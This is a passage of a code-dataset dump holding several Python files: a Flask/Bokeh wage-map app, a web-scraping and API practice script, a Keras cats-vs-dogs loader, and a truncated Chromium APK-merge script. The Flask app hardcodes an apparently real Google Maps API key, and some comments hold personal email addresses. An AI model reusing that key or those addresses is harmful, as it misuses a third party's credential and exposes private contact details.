'NH',\n 'NEW JERSEY': 'NJ',\n 'NEW MEXICO': 'NM',\n 'NEW YORK': 'NY',\n 'NORTH CAROLINA': 'NC',\n 'NORTH DAKOTA': 'ND',\n 'OHIO': 'OH',\n 'OKLAHOMA': 'OK',\n 'OREGON': 'OR',\n 'PENNSYLVANIA': 'PA',\n 'RHODE ISLAND': 'RI',\n 'SOUTH CAROLINA': 'SC',\n 'SOUTH DAKOTA': 'SD',\n 'TENNESSEE': 'TN',\n 'TEXAS': 'TX',\n 'UTAH': 'UT',\n 'VERMONT': 'VT',\n 'VIRGINIA': 'VA',\n 'WASHINGTON': 'WA',\n 'WEST VIRGINIA': 'WV',\n 'WISCONSIN': 'WI',\n 'WYOMING': 'WY',\n 'DISTRICT OF COLUMBIA': 'DC',\n 'PUERTO RICO': 'PR'\n}\n\n\n@app.route('/',methods=['GET','POST'])\ndef index():\n# return render_template('index.html')\n\n if request.method == 'GET':\n return render_template('index.html')\n else:\n statein=request.form['state']\n stateout=str(statein).upper()\n feature=request.form.getlist('feature')\n featurenumber=len(feature)\n plottype=feature[0]\n \n if stateout not in us_state_abbrev.values():\n return 'Please type the abbreviation of your state!'\n \n \n if (featurenumber==2 or featurenumber==0):\n return 'Please select one and only one exploration!'\n \n elif plottype=='boxplot':\n df=df_info[df_info['state']==stateout].set_index('year')\n years = ['2011','2012','2013','2014','2015','2016','2017']\n q1 = df['q25']\n q2 = df['median']\n q3 = df['q75']\n iqr = q3 - q1\n upper= q3 + 1.5*iqr\n lower = q1 - 1.5*iqr\n count=df['count'].values\n ylim=max(count)*1.1\n\n p = figure(tools=\"save\", background_fill_color=\"#EFE8E2\", title=\"Box plot of Wage in \"+str(stateout), x_range=years, x_axis_label='Year', y_axis_label='Wage in $')\n\n # stems\n p.segment(years, upper, years, q3, line_color=\"black\")\n p.segment(years, lower, years, q1, line_color=\"black\")\n\n # boxes\n p.vbar(years, 0.7, q2, q3, fill_color=\"#E08E79\", line_color=\"black\")\n p.vbar(years, 0.7, q1, q2, fill_color=\"#3B8686\", line_color=\"black\")\n\n # whiskers (almost-0 height rects simpler than segments)\n p.rect(years, lower, 0.2, 0.01, line_color=\"black\")\n p.rect(years, upper, 0.2, 0.01, line_color=\"black\")\n\n p.xgrid.grid_line_color = None\n p.ygrid.grid_line_color = \"white\"\n p.grid.grid_line_width = 2\n p.xaxis.major_label_text_font_size=\"12pt\"\n p.left[0].formatter.use_scientific = False\n #p.y_range = Range1d(0, max(upper)*1.1)\n\n p.extra_y_ranges = {\"foo\": Range1d(start=0, end=ylim)}\n p.add_layout(LinearAxis(y_range_name=\"foo\", axis_label=\"Petition Number\"), 'right')\n p.right[0].formatter.use_scientific = False\n p.line(['2011','2012','2013','2014','2015','2016','2017'], count, line_width=2, color=\"blue\", y_range_name=\"foo\",legend=\"petition number\") \n # Embed plot into HTML via Flask Render\n script, div = embed.components(p)\n #show(p)\n return render_template('graph.html', script=script, div=div)\n \n else:\n \n df=df_map\n lat=df[df['state']==stateout]['lat']\n lon=df[df['state']==stateout]['lon']\n count=df[df['state']==stateout]['status']\n maxcount=max(count.values)\n enlarge=float(50)/maxcount\n centerpoint_lat=df[df['state']==stateout].loc[df[df['state']==stateout]['status'].argmax()]['lat']\n centerpoint_lon=df[df['state']==stateout].loc[df[df['state']==stateout]['status'].argmax()]['lon']\n\n map_options = GMapOptions(lat=centerpoint_lat, lng=centerpoint_lon, map_type=\"roadmap\", zoom=8)\n \n plot = GMapPlot(x_range=Range1d(), y_range=Range1d(), map_options=map_options)\n plot.title.text = stateout\n plot.api_key = \"AIzaSyAGF5nTCoxmIGu011TQFLlCjbdGOEF-rUI\"\n\n source = ColumnDataSource(\n data=dict(\n lat=lat,\n lon=lon,\n size=count*enlarge\n )\n )\n\n circle = Circle(x=\"lon\", 
y=\"lat\",size='size', fill_color=\"blue\", fill_alpha=0.8, line_color=None)\n plot.add_glyph(source, circle)\n plot.add_tools(PanTool(), WheelZoomTool(), BoxSelectTool())\n script, div = embed.components(plot)\n\n \n\n return render_template('graph.html', script=script, div=div)\n \n\nif __name__ == '__main__':\n app.run(port=33507)\n", "repo_name": "zhengxiaowan/kellytdi", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5766, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "bokeh.plotting.figure", "line_number": 106, "usage_type": "call"}, {"api_name": "bokeh.models.Range1d", "line_number": 127, "usage_type": "call"}, {"api_name": "bokeh.models.LinearAxis", "line_number": 128, "usage_type": "call"}, {"api_name": "bokeh.embed.components", "line_number": 132, "usage_type": "call"}, {"api_name": "bokeh.embed", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 134, "usage_type": "call"}, {"api_name": "bokeh.models.GMapOptions", "line_number": 147, "usage_type": "call"}, {"api_name": "bokeh.models.GMapPlot", "line_number": 149, "usage_type": "call"}, {"api_name": "bokeh.models.Range1d", "line_number": 149, "usage_type": "call"}, {"api_name": "bokeh.models.ColumnDataSource", "line_number": 153, "usage_type": "call"}, {"api_name": "bokeh.models.Circle", "line_number": 161, "usage_type": "call"}, {"api_name": "bokeh.models.PanTool", "line_number": 163, "usage_type": "call"}, {"api_name": "bokeh.models.WheelZoomTool", "line_number": 163, "usage_type": "call"}, {"api_name": "bokeh.models.BoxSelectTool", "line_number": 163, "usage_type": "call"}, {"api_name": "bokeh.embed.components", "line_number": 164, "usage_type": "call"}, {"api_name": "bokeh.embed", "line_number": 164, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "31343033936", "text": "# getting_data.py\n\n# Just stick some data there\n#with open('email_addresses.txt', 'w') as f: #the file auto closed at the end of with block\n# f.write(\"chenwenyu027@gmail.com\\n\")\n# f.write(\"chenwenyu077@live.com\\n\")\n# f.write(\"wenyu.chen@nokia-sbell.com\\n\")\n \ndef get_domain(email_address: str) -> str:\n \"\"\"Split on '@' and return the last piece\"\"\"\n return email_address.lower().split(\"@\")[-1]\n\nprint(get_domain(\"chenwenyu077@live.com\"))\nprint(get_domain(\"wenyu.chen@nokia-sbell.com\"))\n\n#with open('tab_delimited_stock_prices.txt', 'w') as f:\n# 
f.write(\"\"\"6/20/2014\\tAAPL\\t90.91\n#6/20/2014\\tMSFT\\t41.68\n#6/20/2014\\tFB\\t64.5\n#6/19/2014\\tAAPL\\t91.86\n#6/19/2014\\tMSFT\\t41.51\n#6/19/2014\\tFB\\t64.34\n#\"\"\")\n\nimport csv\n\ndef process(date: str, symbol: str, closing_price: float) -> None:\n # Imagine that this function actually does something.\n #assert closing_price > 0.0\n print(date, symbol, closing_price)\n \nwith open('tab_delimited_stock_prices.txt', 'r') as f:\n tab_reader = csv.reader(f, delimiter='\\t')\n for row in tab_reader:\n date = row[0]\n symbol = row[1]\n closing_price = row[2]\n process(date, symbol, closing_price)\n\n#with open('colon_delimited_stock_prices.txt', 'w') as f:\n# f.write(\"\"\"date:symbol:closing_price\n#6/20/2014:AAPL:90.91\n#6/20/2014:MSFT:41.68\n#6/20/2014:FB:64.5\n#\"\"\")\n\nwith open('colon_delimited_stock_prices.txt','r') as f:\n colon_reader = csv.DictReader(f, delimiter = ':')\n for dict_row in colon_reader:\n date = dict_row[\"date\"]\n symbol = dict_row[\"symbol\"]\n closing_price = float(dict_row[\"closing_price\"])\n process(date, symbol, closing_price)\n \ntoday_prices = {'AAPL': 90.91, 'MSFT': 41.68, 'FB': 64.5}\n\nwith open('comma_delimited_stock_prices.txt', 'w') as f:\n csv_writer = csv.writer(f, delimiter = ',')\n for stock, price in today_prices.items():\n csv_writer.writerow([stock, price])\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n# I put the relevant HTML file on GitHub. In order to fit\n# the URL in the book I had to split it across two lines.\nurl = \"https://raw.githubusercontent.com/joelgrus/data/master/getting-data.html\"\nhtml = requests.get(url).text\nsoup = BeautifulSoup(html,'html5lib')\n\n# to find the first <p> tag and its content\nfirst_paragraph = soup.find('p') # or just soup.p\nfirst_paragraph_text = soup.p.text\nfirst_paragraph_words = soup.p.text.split()\nprint(first_paragraph, first_paragraph_text, first_paragraph_words)\n\nfirst_paragraph_id = soup.p['id']\nfirst_paragraph_id2 = soup.p.get('id')\nprint(first_paragraph_id, first_paragraph_id2)\n\n# to get multiple tags at once\nall_paragraphs = soup.find_all('p') # or just soup('p')\nparagraphs_with_ids = [p for p in soup('p') if p.get('id')]\nprint(all_paragraphs, paragraphs_with_ids)\n\n# to find tags with a specific class\nimportant_paragraphs = soup('p',{'class': 'important'})\nimportant_paragraphs2 = soup('p','important')\nimportant_paragraphs3 = [p for p in soup('p')\n if 'important' in p.get('class',[])]\n\nprint(important_paragraphs, important_paragraphs2, important_paragraphs3)\n\n# to get spans inside divs\nspans_inside_divs = [span\n for div in soup('div')\n for span in div('span')]\nprint(spans_inside_divs)\n\n# to collect all of the URLs linked to\nfrom bs4 import BeautifulSoup\nimport requests\n\nurl = \"https://www.house.gov/representatives\"\ntext = requests.get(url).text\nsoup = BeautifulSoup(text, 'html5lib')\n\nall_urls = [a['href']\n for a in soup('a')\n if a.has_attr('href')]\n\nprint(all_urls)\nprint(len(all_urls))\n\n\nimport re\n# must start with http:// or https://\n# must end with .house.gov or .house.gov/\nregex = r\"^https?://.*\\.house\\.gov/?$\"\n\n#Let's write some tests!\nassert re.match(regex, \"http://joel.house.gov\")\nassert re.match(regex, \"https://joel.house.gov\")\nassert re.match(regex, \"http://joel.house.gov/\")\nassert re.match(regex, \"https://joel.house.gov/\")\nassert not re.match(regex, \"joel.house.gov\")\nassert not re.match(regex, \"http://joel.house.com\")\nassert not re.match(regex, \"https://joel.house.gov/biography\")\n\n#And now apply\ngood_urls = [url for url in all_urls if re.match(regex, url)]\nprint(good_urls)\nprint(len(good_urls))\n\n# to get rid of duplicate ones\ngood_urls = list(set(good_urls))\nprint(good_urls)\nprint(len(good_urls))\n\nhtml = requests.get('https://jayapal.house.gov').text\nsoup = BeautifulSoup(html, 'html5lib')\n\n# use a set because the links might appear multiple times.\nlinks = {a['href'] for a in soup('a') if 'press releases' in a.text.lower()}\nprint(links)\n\nif 0 :\n from typing import Dict, Set\n\n press_releases: Dict[str, Set[str]] = {}\n\n for house_url in good_urls:\n html = requests.get(house_url).text\n soup = BeautifulSoup(html, 'html5lib')\n\n pr_links = {a['href'] for a in soup('a') if 'press releases' in a.text.lower()}\n print(f\"{house_url}: {pr_links}\")\n\n press_releases[house_url] = pr_links\n\n print(press_releases)\n\ndef paragraph_mentions(text: str, keyword: str) -> bool:\n \"\"\" Returns True if <p> inside the text mentions {keyword}\"\"\"\n soup = BeautifulSoup(text, \"html5lib\")\n paragraphs = [p.get_text() for p in soup('p')]\n\n return any(keyword.lower() in paragraph.lower()\n for paragraph in paragraphs)\n\ntext = \"\"\"<body><h1>Facebook</h1><p>Twitter</p></body>\"\"\"\n#result = paragraph_mentions(text, \"twitter\")\n#print(\"twitter in <p>\", result)\n#result = paragraph_mentions(text, \"facebook\")\n#print(\"facebook in <p>\", result)\nassert paragraph_mentions(text, \"twitter\") # is inside <p>\nassert not paragraph_mentions(text, \"facebook\") # not inside <p>
\n\n# get \"data\" in press_releases\nif 0 :\n for house_url, pr_links in press_releases.items():\n for pr_link in pr_links:\n url = f\"{house_url}/{pr_link}\"\n text = requests.get(url).text\n\n if paragraph_mentions(text, \"data\"):\n print(f\"{house_url}\")\n break #done with this house_url\n\n# serialization\nimport json\nserialized = \"\"\"{\"title\": \"Data Science Book\",\n \"author\": \"Joel Grus\",\n \"publicationYear\": 2019,\n \"topics\": [ \"data\", \"science\", \"data science\" ] }\"\"\"\n\n#parse the JSON to create a Python dict\ndeserialized = json.loads(serialized)\nprint(deserialized)\nassert deserialized[\"publicationYear\"] == 2019\nassert \"data science\" in deserialized[\"topics\"]\n\ngithub_user = \"joelgrus\"\nendpoint = f\"https://api.github.com/users/{github_user}/repos\"\nprint(endpoint)\nrepos = json.loads(requests.get(endpoint).text)\nprint(repos)\n\nfrom collections import Counter\nfrom dateutil.parser import parse\n\ndates = [parse(repo[\"created_at\"]) for repo in repos]\nprint(\"created at\", dates)\nmonth_counts = Counter(date.month for date in dates)\nprint(\"month_counts:\", month_counts)\nweekday_counts = Counter(date.weekday() for date in dates)\nprint(\"weekday_counts:\", weekday_counts)\n\n# get the language of my last five repos\nlast_5_repos = sorted(repos,\n key = lambda r: r[\"pushed_at\"],\n reverse = True)[:5]\nlast_5_languages = [repo[\"language\"] for repo in last_5_repos]\nprint(last_5_languages)\n\n#list of python api wrappers:\n# https://github.com/realpython/list-of-python-api-wrappers\n\n\n", "repo_name": "wenyuc/datascience", "sub_path": "getting_data.py", "file_name": "getting_data.py", "file_ext": "py", "file_size_in_byte": 7302, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 33, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 48, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 58, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 68, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 69, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 105, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 106, "usage_type": "call"}, {"api_name": "re.match", "line_number": 122, "usage_type": "call"}, {"api_name": "re.match", "line_number": 123, "usage_type": "call"}, {"api_name": "re.match", "line_number": 124, "usage_type": "call"}, {"api_name": "re.match", "line_number": 125, "usage_type": "call"}, {"api_name": "re.match", "line_number": 126, "usage_type": "call"}, {"api_name": "re.match", "line_number": 127, "usage_type": "call"}, {"api_name": "re.match", "line_number": 128, "usage_type": "call"}, {"api_name": "re.match", "line_number": 131, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 140, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 141, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 150, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 150, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 153, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 154, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 165, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 184, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 198, "usage_type": "call"}, 
{"api_name": "json.loads", "line_number": 206, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 206, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 212, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 214, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 216, "usage_type": "call"}]} +{"seq_id": "37344074236", "text": "import os\nimport numpy as np\nimport cv2\nfrom skimage import transform\n\nfrom tensorflow.keras.utils import to_categorical\nfrom typing import Tuple\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split\n\n# %%\nDATA_DIR = os.path.join(\"C:/Selbststudium/Zubehoer/Cats_and_dogs\")\nX_FILE_PATH = os.path.join(DATA_DIR, \"x.npy\")\nY_FILE_PATH = os.path.join(DATA_DIR, \"y.npy\")\nIMG_SIZE = 64\nIMG_DEPTH = 3\nIMG_SHAPE = (IMG_SIZE, IMG_SIZE, IMG_DEPTH)\n\n# %%\ndef extract_cats_vs_dogs():\n # Read in the images and do the preprocessing\n cats_dir = os.path.join(DATA_DIR, \"Cat\")\n dogs_dir = os.path.join(DATA_DIR, \"Dog\")\n dirs = [cats_dir, dogs_dir]\n class_names = [\"cat\", \"dog\"]\n # Anything that is not an image has to go:\n for d in dirs:\n for f in os.listdir(d): # All files located in d\n if f.split(\".\")[-1] != \"jpg\": # The last element of the list, i.e. the file extension\n print(f\"Removing file: {f}\")\n os.remove(os.path.join(d, f))\n num_cats = len(os.listdir(cats_dir))\n num_dogs = len(os.listdir(dogs_dir))\n num_images = num_cats + num_dogs\n x = np.zeros(\n shape=(num_images, IMG_SIZE, IMG_SIZE, IMG_DEPTH),\n dtype=np.float32\n )\n y = np.zeros(\n shape=(num_images,),\n dtype=np.float32\n )\n\n cnt = 0\n for d, class_name in zip(dirs, class_names):\n for f in os.listdir(d):\n img_file_path = os.path.join(d, f)\n try:\n img = cv2.imread(img_file_path, cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n x[cnt] = transform.resize(\n image=img,\n output_shape=IMG_SHAPE\n )\n if class_name == \"cat\":\n y[cnt] = 0\n elif class_name == \"dog\":\n y[cnt] = 1\n else:\n print(f\"Invalid classname\")\n cnt+=1\n except: # noqa: E722\n print(f\"Image could not be read\")\n os.remove(img_file_path)\n\n # Dropping not readable img_idxs\n x = x[:cnt]\n y = y[:cnt]\n\n np.save(X_FILE_PATH, x)\n np.save(Y_FILE_PATH, y)\n\n# %%\nclass DOGSCATS:\n def __init__(self, test_size: float = 0.2, validation_size = 0.33) -> None:\n # User-defined constants\n self.num_classes = 10\n self.batch_size = 128\n # Load dataset\n x = np.load(X_FILE_PATH)\n y = np.load(Y_FILE_PATH)\n # Split dataset\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=test_size)\n x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=validation_size)\n # Preprocess x\n self.x_train = x_train.astype(np.float32)\n self.x_test = x_test.astype(np.float32)\n self.x_val = x_val.astype(np.float32)\n # Preprocess y\n self.y_train = to_categorical(y_train, num_classes=self.num_classes)\n self.y_test = to_categorical(y_test, num_classes=self.num_classes)\n self.y_val = to_categorical(y_val, num_classes=self.num_classes)\n # Dataset attributes\n self.train_size = self.x_train.shape[0]\n self.test_size = self.x_test.shape[0]\n self.tval_size = self.x_val.shape[0]\n self.width = self.x_train.shape[1]\n self.height = self.x_train.shape[2]\n self.depth = self.x_train.shape[3]\n self.img_shape = (self.width, self.height, self.depth)\n\n def get_train_set(self) -> Tuple[np.ndarray, np.ndarray]:\n return 
(self.x_train, self.y_train)\n \n def get_test_set(self) -> Tuple[np.ndarray, np.ndarray]:\n return (self.x_test, self.y_test)\n\n def get_val_set(self) -> Tuple[np.ndarray, np.ndarray]:\n return (self.x_val, self.y_val)\n\n def data_augmentation(self, augment_size: int = 5_000) -> None:\n image_generator = ImageDataGenerator(\n rotation_range = 5,\n zoom_range=0.08,\n width_shift_range=0.08,\n height_shift_range=0.08\n )\n # Fit the data generator\n image_generator.fit(self.x_train, augment=True)\n # Get random train images for the data augmentation\n rand_idxs = np.random.randint(self.train_size, size=augment_size)\n x_augmented = self.x_train[rand_idxs].copy()\n y_augmented = self.y_train[rand_idxs].copy()\n x_augmented = image_generator.flow(\n x_augmented,\n np.zeros(augment_size),\n batch_size=augment_size,\n shuffle=False\n ).next()[0]\n # Append the augmented images to the train set\n self.x_train = np.concatenate((self.x_train, x_augmented))\n self.y_train = np.concatenate((self.y_train, y_augmented))\n self.train_size = self.x_train.shape[0]", "repo_name": "gvtsch/Udemy_Tensorflow", "sub_path": "Chapter9_AdvancedDL/Chapter9_1_CustomDataset/dogscatsData.py", "file_name": "dogscatsData.py", "file_ext": "py", "file_size_in_byte": 4828, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 50, "usage_type": "attribute"}, {"api_name": "skimage.transform.resize", "line_number": 51, "usage_type": "call"}, {"api_name": "skimage.transform", "line_number": 51, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.save", 
"line_number": 70, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 81, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 86, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 92, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 102, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 105, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 108, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 108, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "12780245175", "text": "import argparse\nimport collections\nimport filecmp\nimport logging\nimport os\nimport pprint\nimport re\nimport shutil\nimport sys\nimport tempfile\nimport zipfile\n\nSRC_DIR = os.path.join(os.path.dirname(__file__), '..', '..')\nSRC_DIR = os.path.abspath(SRC_DIR)\nBUILD_ANDROID_DIR = os.path.join(SRC_DIR, 'build', 'android')\nBUILD_ANDROID_GYP_DIR = os.path.join(BUILD_ANDROID_DIR, 'gyp')\nsys.path.append(BUILD_ANDROID_GYP_DIR)\n\nimport finalize_apk # pylint: disable=import-error\nfrom util import build_utils # pylint: disable=import-error\n\nsys.path.append(BUILD_ANDROID_DIR)\n\nfrom pylib import constants # pylint: disable=import-error\n\nDEFAULT_ZIPALIGN_PATH = os.path.join(\n SRC_DIR, 'third_party', 'android_tools', 'sdk', 'build-tools',\n constants.ANDROID_SDK_BUILD_TOOLS_VERSION, 'zipalign')\n\n\nclass ApkMergeFailure(Exception):\n pass\n\n\ndef UnpackApk(file_name, dst):\n zippy = zipfile.ZipFile(file_name)\n zippy.extractall(dst)\n\n\ndef GetNonDirFiles(top, base_dir):\n \"\"\" Return a list containing all (non-directory) files in tree with top as\n root.\n\n Each file is represented by the relative path from base_dir to that file.\n If top is a file (not a directory) then a list containing only top is\n returned.\n \"\"\"\n if os.path.isdir(top):\n ret = []\n for dirpath, _, filenames in os.walk(top):\n for filename in filenames:\n ret.append(\n os.path.relpath(os.path.join(dirpath, filename), base_dir))\n return ret\n else:\n return [os.path.relpath(top, base_dir)]\n\n\ndef GetDiffFiles(dcmp, base_dir):\n \"\"\" Return the list of files contained only in the right 
directory of dcmp.\n\n The files returned are represented by relative paths from base_dir.\n \"\"\"\n copy_files = []\n for file_name in dcmp.right_only:\n copy_files.extend(\n GetNonDirFiles(os.path.join(dcmp.right, file_name), base_dir))\n\n # we cannot merge APKs with files with similar names but different contents\n if len(dcmp.diff_files) > 0:\n raise ApkMergeFailure('found differing files: %s in %s and %s' %\n (dcmp.diff_files, dcmp.left, dcmp.right))\n\n if len(dcmp.funny_files) > 0:\n raise ApkMergeFailure('found uncomparable files: %s in %s and %s' %\n (dcmp.funny_files, dcmp.left, dcmp.right))\n\n for sub_dcmp in dcmp.subdirs.itervalues():\n copy_files.extend(GetDiffFiles(sub_dcmp, base_dir))\n return copy_files\n\n\ndef CheckFilesExpected(actual_files, expected_files, component_build):\n \"\"\" Check that the lists of actual and expected files are the same. \"\"\"\n actual_file_names = collections.defaultdict(int)\n for f in actual_files:\n actual_file_names[os.path.basename(f)] += 1\n actual_file_set = set(actual_file_names.iterkeys())\n expected_file_set = set(expected_files.iterkeys())\n\n unexpected_file_set = actual_file_set.difference(expected_file_set)\n if component_build:\n unexpected_file_set = set(\n f for f in unexpected_file_set if not f.endswith('.so'))\n missing_file_set = expected_file_set.difference(actual_file_set)\n duplicate_file_set = set(\n f for f, n in actual_file_names.iteritems() if n > 1)\n\n # TODO(crbug.com/839191): Remove this once we're plumbing the lib correctly.\n missing_file_set = set(\n f for f in missing_file_set if not os.path.basename(f) ==\n 'libarcore_sdk_c_minimal.so')\n\n errors = []\n if unexpected_file_set:\n errors.append(\n ' unexpected files: %s' % pprint.pformat(unexpected_file_set))\n if missing_file_set:\n errors.append(' missing files: %s' % pprint.pformat(missing_file_set))\n if duplicate_file_set:\n errors.append(' duplicate files: %s' % pprint.pformat(duplicate_file_set))\n\n if errors:\n raise ApkMergeFailure(\n \"Files don't match expectations:\\n%s\" % '\\n'.join(errors))\n\n\ndef AddDiffFiles(diff_files, tmp_dir_32, out_zip, expected_files,\n component_build, uncompress_shared_libraries):\n \"\"\" Insert files only present in 32-bit APK into 64-bit APK (tmp_apk). 
\"\"\"\n for diff_file in diff_files:\n if component_build and diff_file.endswith('.so'):\n compress = not uncompress_shared_libraries\n else:\n compress = expected_files[os.path.basename(diff_file)]\n build_utils.AddToZipHermetic(out_zip,\n diff_file,\n os.path.join(tmp_dir_32, diff_file),\n compress=compress)\n\n\ndef SignAndAlignApk(tmp_apk, signed_tmp_apk, new_apk, zipalign_path,\n keystore_path, key_name, key_password):\n try:\n finalize_apk.JarSigner(\n keystore_path,\n key_name,\n key_password,\n tmp_apk,\n signed_tmp_apk)\n except build_utils.CalledProcessError as e:\n raise ApkMergeFailure('Failed to sign APK: ' + e.output)\n\n try:\n finalize_apk.AlignApk(zipalign_path,\n signed_tmp_apk,\n new_apk)\n except build_utils.CalledProcessError as e:\n raise ApkMergeFailure('Failed to align APK: ' + e.output)\n\ndef GetSecondaryAbi(apk_zipfile, shared_library):\n ret = ''\n for name in apk_zipfile.namelist():\n if os.path.basename(name) == shared_library:\n abi = re.search('(^lib/)(.+)(/' + shared_library + '$)', name).group(2)\n # Intentionally not to add 64bit abi because they are not used.\n if abi == 'armeabi-v7a' or abi == 'armeabi':\n ret = 'arm64-v8a'\n elif abi == 'mips':\n ret = 'mips64'\n elif abi == 'x86':\n ret = 'x86_64'\n else:\n raise ApkMergeFailure('Unsupported abi ' + abi)\n if ret == '':\n raise ApkMergeFailure('Failed to find secondary abi')\n return ret\n\ndef MergeApk(args, tmp_apk, tmp_dir_32, tmp_dir_64):\n # Expected files to copy from 32- to 64-bit APK together with whether to\n # compress within the .apk.\n expected_files = {'snapshot_blob_32.bin': False}\n if args.shared_library:\n expected_files[args.shared_library] = not args.uncompress_shared_libraries\n if args.has_unwind_cfi:\n expected_files['unwind_cfi_32'] = False\n\n # TODO(crbug.com/839191): we should pass this in via script arguments.\n if not args.loadable_module_32:\n args.loadable_module_32.append('libarcore_sdk_c_minimal.so')\n\n for f in args.loadable_module_32:\n expected_files[f] = not args.uncompress_shared_libraries\n\n for f in args.loadable_module_64:\n expected_files[f] = not args.uncompress_shared_libraries\n\n # need to unpack APKs to compare their contents\n UnpackApk(args.apk_64bit, 